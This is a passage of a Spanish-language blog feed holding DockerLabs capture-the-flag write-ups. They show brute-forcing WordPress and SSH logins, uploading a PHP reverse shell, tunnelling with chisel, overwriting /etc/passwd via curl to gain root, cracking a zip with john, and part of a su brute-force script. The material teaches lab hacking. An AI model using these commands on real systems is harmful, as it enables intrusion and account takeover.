  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/e6917c8d-6f9a-4acc-9d12-430349e0fcbc&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Encontramos dos repositorios interesantes un wordpress y un phpmyadmin&lt;/p&gt;

&lt;p&gt;Vamos a ver el wp-admin&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ac58d7be-9ac7-422d-89f8-20bf75ef67bc&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Lo tenemos que agregar en el archivo /etc/hosts&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/7c61eb3c-2e65-4b64-9101-ba41b066a9cc&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que nos dice que el usuario juan no esta registrado asi que vamos a probar cual si es el correcto de los usuarios de los profesores.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bb02c92a-3528-4f0a-9856-f75f79065f49&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que luisillo nos cambia el error por eso sabremos que este es el usuario vulnerable&lt;/p&gt;

&lt;p&gt;Vamos hacer un ataque de fuerza bruta con este usuario, pero no encuentra la contraseña así que como tenemos bastante información del usuario podríamos crear un diccionario de contraseñas para este usuario.&lt;/p&gt;

&lt;p&gt;Para ello vamos a usar el script del usuario Mebus de Github, pero también podríamos usar crunch entre otras.&lt;/p&gt;

&lt;p&gt;https://github.com/Mebus/cupp.git&lt;/p&gt;

&lt;p&gt;Una vez creado el diccionario vamos a usar wpscan para hacer un ataque de fuerza bruta con el usuario luisillo y el diccionario creado.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bdf3fba0-6273-4fea-929b-265c5b62550b&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Nos encuentra la contraseña, vamos acceder al wordpress.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/81b79a43-4dd4-45ae-8a87-54aca7c13c85&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que tiene WP File Manager esto es un gestor de archivos donde podemos ver, eliminar y subir archivos al wordpress&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/6a00abb8-97d0-4f94-b1e2-b5e0602362e7&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b376e91c-a019-4351-9de1-5c4ef23978fe&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Como podemos subir archivo vamos a subir un archivo php que nos mande una reverse shell a nuestro equipo, usaremos la de pentest monkey&lt;/p&gt;

&lt;p&gt;La subimos y le damos click encima para que nos mande la reverse shell.&lt;/p&gt;

&lt;p&gt;Es importante que en el terminal nos pongamos en escucha con NetCat.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/dbdc332c-d232-4e7b-8787-bc46177d198f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/2946c493-1eb1-449b-89e6-24f4714e3594&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si nos dirigimos al directorio Home encontramos un secret.txt&lt;/p&gt;

&lt;p&gt;En su interior encontramos la contraseña del usuario luisillo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/cad7ca6c-c560-460f-b14e-206c775c6c77&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora que somos luisillo si hacemos un sudo -l vemos que podemos ejecutar el binario awk como cualquier usuario vamos a investigar este binario a  ver de que forma podemos escalar privilegios.&lt;/p&gt;

&lt;h2 id=&quot;escalada-de-privilegios&quot;&gt;Escalada de privilegios&lt;/h2&gt;

&lt;p&gt;En GTFobins encontramos la repuesta&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/5c557908-e7f8-45b1-8311-52ae9092b602&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos root&lt;/p&gt;
</description>
        <pubDate>Fri, 21 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//Escolares</link>
        <link href="https://romabri.github.io/Escolares"/>
        <guid isPermaLink="true">https://romabri.github.io/Escolares</guid>
      </item>
    
      <item>
        <title>Dark - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Medio&lt;/td&gt;
      &lt;td&gt;Mishineti&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Con ARP scan miramos que IP’s tenemos disponibles.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/90bbb5c4-e3e3-4e14-8ce1-a05e8c868d2f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/4ee4ae2b-05b5-4f1b-bc46-f1de388e2928&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 22 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SSH&lt;/code&gt; y el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/db8954cd-6eb6-4d53-a166-2583703be1a8&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Gobuster ha encontrado diferentes direcotrios&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/2bec169f-7a35-4b87-8b1d-ce84fb315528&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si accedemos al repositorio info vemos lo siguiente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/8a08e14b-8788-4b18-aafe-6d537e9d3b81&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos un posible usuario para poder acceder vía SSH vamos hacer fuerza bruta.&lt;/p&gt;

&lt;h2 id=&quot;ataque-de-fuerza-bruta-con-hydra&quot;&gt;Ataque de fuerza bruta con Hydra&lt;/h2&gt;

&lt;p&gt;Como tenemos un posible usuario, vamos hacer un ataque de fuerza bruta con Hydra al protocolo SSH de la siguiente forma:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hydra -l toni -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-l&lt;/code&gt; - Para especificar el usaurio&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-P&lt;/code&gt; - Para especificar que diccionario de fuerza bruta usaremos&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh://10.10.10.2&lt;/code&gt; - Especificamos que queremos atentar contra el protocolo SSH de la IP victima&lt;/li&gt;
  &lt;li&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/0c95c5a3-f15f-4ee2-b08f-3d45c8727ff8&quot; alt=&quot;imagen&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Como vemos, existe el usuario &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;toni&lt;/code&gt; y la contraseña es &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;banana&lt;/code&gt;.&lt;/p&gt;

&lt;h2 id=&quot;intrusión&quot;&gt;Intrusión&lt;/h2&gt;

&lt;p&gt;Ahora accedemos vía SSH&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh toni@172.17.0.2&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/7ce27cf7-1115-4013-856d-10f61f12907a&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que tiene otra interfaz de red&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/4baaefbd-707f-421b-b223-5c236c196e71&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;No veo la forma de como escalar privilegios en esta maquina ni con linpeas así que vamos a pasarnos chisel a esta maquina con curl y vamos a generar el tunel para redirigir el trafico de la 20.20.20.3 a nuestra maquina.&lt;/p&gt;

&lt;p&gt;Nos pasamos el chisel a la maquina 10.10.10.2.&lt;/p&gt;

&lt;p&gt;Ahora desde la máquina atacante nos ponemos en escucha con chisel.&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;chisel server &lt;span class=&quot;nt&quot;&gt;--reverse&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 1234
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Y en la maquina victima con IP 10.10.10.2 configuramos el chisel para que podamos ver desde la maquina 10.10.10.1 la IP 20.20.20.2.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;./chisel client 10.10.10.1:1234 R:socks
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f24c31b6-32b8-4871-8463-4de85f3487b2&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/c0592109-763a-4865-8aee-816fbbd4ea8a&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Genial ya nos funciona como nos decía que tenia una web donde había subido la base de datos de la DGT etc…,vamos a configurar foxyproxy para acceder a la web de esa IP.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/8fa6d9ec-c1de-41fc-a33f-a6b539877270&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora si accedemos a la IP 20.20.20.3 vemos lo siguiente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ad0e6acf-9a40-4383-877e-3f1ac2808fbb&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a pasar-le gobuster haber si encuentra algún directorio interesante.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/23a69f7d-d75e-4575-812c-35b190ca8434&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;no encontramos nada interesante, entonces vamos a probar de ingresar algo en el campo de busqueda.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/7f909a66-70b1-4456-a5b6-96cca72c2479&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/d520b7f4-c73c-4812-9808-134ceccd5519&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que nos muestra información del sistema&lt;/p&gt;

&lt;p&gt;Ahora vamos a listar el /etc/passwd&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bcf13bf7-a3e4-4a79-82d4-979e10efafe9&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;No vemos un posible usuario para hacer fuerza bruta entoces lo que voy hacer sera mandarme una reverse shell&lt;/p&gt;

&lt;p&gt;Lo que podemos hacer es mandarnos una reverse shell a la maquina 20.20.20.2&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/461d5b5d-2db0-4a78-b68b-e00879b22cee&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/1e0eb547-4698-4a61-82b4-3b27d76cf02e&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Al estar investigando un rato vemos que no hay nada interesante para poder escalar privilegios lo que podemos hacer es usar curl para poder modificar el archivo /etc/passwd y así acceder al root.&lt;/p&gt;

&lt;p&gt;Veamos como se hace esto&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/92431d1e-d6e4-4447-b0f1-25132e037929&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Copiamos el passwd a la carpeta /tmp&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/a9e743a2-9431-4b5d-8b9a-d93f2cf997ed&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora eliminamos la primera x que tiene root y guardamos&lt;/p&gt;

&lt;p&gt;Ahora hacemos el siguiente comadno&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;curl file:///tmp/passwd -o /etc/passwd
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/6d37694c-1514-4542-bbf2-55243d7b78ff&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si hacemos un cat a /etc/passwd ahora vemos que en root ya no tiene la x.&lt;/p&gt;

&lt;p&gt;Esto sucede debido a cómo se manejan los permisos y la propiedad del archivo en Linux&lt;/p&gt;

&lt;p&gt;Ahora solo queda hacer su root y escalaremos a root sin necesidad de introducir contraseña&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/27d34c2b-11a8-4ccb-a656-da85871b1037&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos ROOT&lt;/p&gt;
</description>
        <pubDate>Fri, 21 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//Dark</link>
        <link href="https://romabri.github.io/Dark"/>
        <guid isPermaLink="true">https://romabri.github.io/Dark</guid>
      </item>
    
      <item>
        <title>Bashpariencias - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Medio&lt;/td&gt;
      &lt;td&gt;Firstatack&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/0108d083-1317-4f6c-a803-1015232037ad&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 8899 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SSH&lt;/code&gt; y el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/9ee65e73-bb29-4ebb-a03d-1a58250108c1&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si investigamos muy a fondo la web vemos que en el apartado Form se esta exponiendo algo interesante.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/a57129f1-51ce-478d-8eef-30af881a88fe&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Parece ser que nos esta dando un nombre vamos a revisar el codigo fuente y filtrar por ese nombre. (Siempre hemos de revisar el codigo fuente de la pagina ya que nos puede mostrar información como en este caso que esta oculta)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/c43e754b-8255-40bb-b933-3a728a5f7515&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vaya tenemos una posible contraseña para el usuario rosa.&lt;/p&gt;

&lt;p&gt;Vamos a conectarnos por ssh que recordemos que esta en el puerto 8899&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/683a3cc2-4a59-45e1-aa78-2360a8c4d89e&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si vamos al directorio home vemos diferentes usuarios y un archivo txt, el archivo txt no tenemos permisos para verlo así que vamos al directorio de rosa&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/3a1f1b78-20fd-4efc-827e-e3f14e8cf5a8&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;En el directorio de Rosa hay lo siguiente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/be0ea688-6ddf-41de-aafe-8fe78279e147&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Un directorio llamado -, vamos acceder&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/46a9e342-72ee-4e82-aaf5-af6b93bcc28b&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Nos encontramos con un txt y un zip vamos a leer el txt&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/e3524880-0923-4274-9fb1-92f32b0d5155&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Perfecto pues si intentamos extraer el zip tiene contraseña asi que vamos a intentar con john hacer fuerza burta a este zip de la siguiente forma.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;- Nos descargamos el archivo a nestra maquina atacante con : python3 -m http.server 5000
- Desde nuestra maquina atacante hacemos un wget http://172.21.0.2/archivo
- Ahora vamos a extraer el hash del archivo zip con : zip2john archivo &amp;gt; hash
- Por ultimo vamos a craquear el hash con john --wordlist=/usr/share/wordlists/rockyou.txt hash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bfd136d4-790a-4da3-9ecc-eced6ec86652&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hemos obtenido la contraseña vamos a descomprimir el zip&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b1efd844-9f38-4e8b-8cff-fe19f695b7c3&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya tenemos la contraseña del usuario juan:hackwhitbash&lt;/p&gt;

&lt;p&gt;Ahora vamos a escalar al usuario Juan y si hacemos sudo -l vemos que tenemos los binarios tree y cat que los podemos ejecutar como el usuario carlos.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/2316f521-5fb5-4587-b080-80db9b4f202f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a listar el directorio de carlos para ver si encontramos algo&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/4ee27d0d-2df9-4ac0-8c51-6e58dbcd2ff2&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Encontramos un archivo llamado .misecreto.txt vamos hacer uso del binario cat con el usuario carlos para poder acceder a ese archivo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/4ef84a86-2475-41cb-bb1c-2601e7c9f4cb&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Lo que tendremos que hacer script que nos genere un diccionario para mas tarde hacer fuerza burta en local.&lt;/p&gt;

&lt;p&gt;para el script del diccionario yo se lo he pedido a ChatGPT que me lo haga&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;```bash  
#!/bin/bash  
  
# Definimos la palabra base  
palabra_base=&quot;chocolate&quot;  
  
# Iteramos sobre cada letra del alfabeto en un orden diferente  
for letra1 in {a..z}; do  
   for letra2 in {a..z}; do  
       for letra3 in {a..z}; do  
           # Construimos la palabra utilizando un formato diferente  
           nueva_palabra=&quot;${letra1}${letra2}${letra3}${palabra_base}&quot;  
           echo $nueva_palabra &amp;gt;&amp;gt; dict2.txt  
       done  
   done  
done
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;y el script para hacer fuerza bruta es el siguente que si no recuerdo mal es de el PinguinodeMario&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;#!/bin/bash  
  
# Función que se ejecutará en caso de que el usuario no proporcione 2 argumentos.  
mostrar_ayuda() {  
   echo -e &quot;\e[1;33mUso: $0 USUARIO DICCIONARIO&quot;  
